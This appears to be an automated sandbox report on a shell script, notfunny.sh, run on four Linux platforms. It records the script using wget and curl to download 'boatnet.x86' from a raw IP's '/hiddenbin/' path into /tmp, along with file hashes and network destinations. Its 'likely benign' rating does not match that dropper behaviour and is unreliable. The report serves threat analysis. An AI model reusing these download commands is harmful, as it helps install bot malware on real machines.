Analysis Overview
SHA256
9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b
Threat Level: Likely benign
The file notfunny.sh was found to be: Likely benign.
Malicious Activity Summary
UPX packed file
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 01:18
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 01:18
Reported
2024-10-28 01:20
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
128s
Command Line
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
Processes
/tmp/notfunny.sh
[/tmp/notfunny.sh]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]
Network
| Country | Destination | Domain | Proto |
| US | 154.216.19.166:3000 | 154.216.19.166 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 154.216.19.166:3000 | 154.216.19.166 | tcp |
Files
/tmp/boatnet.x86
| MD5 | 8833728bd41c20fb14e6075a9cdd8afc |
| SHA1 | 9733c8e51ed6c6a349cfadaf9bfc58aa5222feaa |
| SHA256 | ff2f19e0d279d3c53e6c154790dbaaeccb8d5664399d68ba4c44bdd3405c8671 |
| SHA512 | 58fe870f0f8b470c70a843e44f603478ac368406a947a1fb46230577179357c633168dd63071ca6ca0365d553972decddc13264ac35fa2d4632c82b4d414ce48 |
/tmp/boatnet.x86
| MD5 | fae60c4eac7b4998f780c9e78baea871 |
| SHA1 | 1e398be7855c3971eae39a1b860324b34483876c |
| SHA256 | 26044e5d1c95ad4518fce56f55f3b8163eeae768ec1ffc06ff0e26563a94c1e6 |
| SHA512 | cd51a9e0ecf5e306db58eac8ee5261f67bb3331aa78d2d2abea88bf0da23c28ef9e86fa843c3fe123b8545ea7934dc66f1c70436cd7f1147977382d2ee5afad5 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-28 01:18
Reported
2024-10-28 01:20
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
127s
Command Line
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
Processes
/tmp/notfunny.sh
[/tmp/notfunny.sh]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]
Network
| Country | Destination | Domain | Proto |
| US | 154.216.19.166:3000 | 154.216.19.166 | tcp |
| US | 154.216.19.166:3000 | 154.216.19.166 | tcp |
Files
/tmp/boatnet.x86
| MD5 | 8833728bd41c20fb14e6075a9cdd8afc |
| SHA1 | 9733c8e51ed6c6a349cfadaf9bfc58aa5222feaa |
| SHA256 | ff2f19e0d279d3c53e6c154790dbaaeccb8d5664399d68ba4c44bdd3405c8671 |
| SHA512 | 58fe870f0f8b470c70a843e44f603478ac368406a947a1fb46230577179357c633168dd63071ca6ca0365d553972decddc13264ac35fa2d4632c82b4d414ce48 |
/tmp/boatnet.x86
| MD5 | 12776fc203b937b6422e57bbbbcbf012 |
| SHA1 | d656e47cc7c9df12f563f9e10c35594dadb3e682 |
| SHA256 | a037afc2c98a4db8eecd784faacbfdc713c42ae1e8a6c804a6cc2ed7244b3623 |
| SHA512 | 93a943182e6da55369f6a2fbeca918469eb726609584ca128d845d0d772efb34ed53069df7715bac1250f2dfa1cfdeb6f246edfcec7825414ca9d61d86e8ae34 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-28 01:18
Reported
2024-10-28 01:20
Platform
debian9-mipsbe-20240611-en
Max time kernel
149s
Max time network
28s
Command Line
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
Processes
/tmp/notfunny.sh
[/tmp/notfunny.sh]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]
Network
| Country | Destination | Domain | Proto |
| US | 154.216.19.166:3000 | 154.216.19.166 | tcp |
Files
/tmp/boatnet.x86
| MD5 | 54e076b42cc4c7bc77ed783c93733706 |
| SHA1 | 60142c48cd534ab3069378d73a63c87627efb42b |
| SHA256 | fbc7b2a7d16b78fc5360b2709692ae863466577e3fd0de5e4245cc2432d33a13 |
| SHA512 | cabea678a945078356c35a68a2cab192bbb6ceb1c47ca05e9f3b519be4832bdd8ab6d78226617cf5de4b4f19097dcb9ebf142c7259234bd2c6f6118c7adaaa2a |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-28 01:18
Reported
2024-10-28 01:20
Platform
debian9-mipsel-20240611-en
Max time kernel
149s
Max time network
122s
Command Line
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
Processes
/tmp/notfunny.sh
[/tmp/notfunny.sh]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]
Network
| Country | Destination | Domain | Proto |
| US | 154.216.19.166:3000 | 154.216.19.166 | tcp |
| US | 154.216.19.166:3000 | 154.216.19.166 | tcp |
Files
/tmp/boatnet.x86
| MD5 | 8833728bd41c20fb14e6075a9cdd8afc |
| SHA1 | 9733c8e51ed6c6a349cfadaf9bfc58aa5222feaa |
| SHA256 | ff2f19e0d279d3c53e6c154790dbaaeccb8d5664399d68ba4c44bdd3405c8671 |
| SHA512 | 58fe870f0f8b470c70a843e44f603478ac368406a947a1fb46230577179357c633168dd63071ca6ca0365d553972decddc13264ac35fa2d4632c82b4d414ce48 |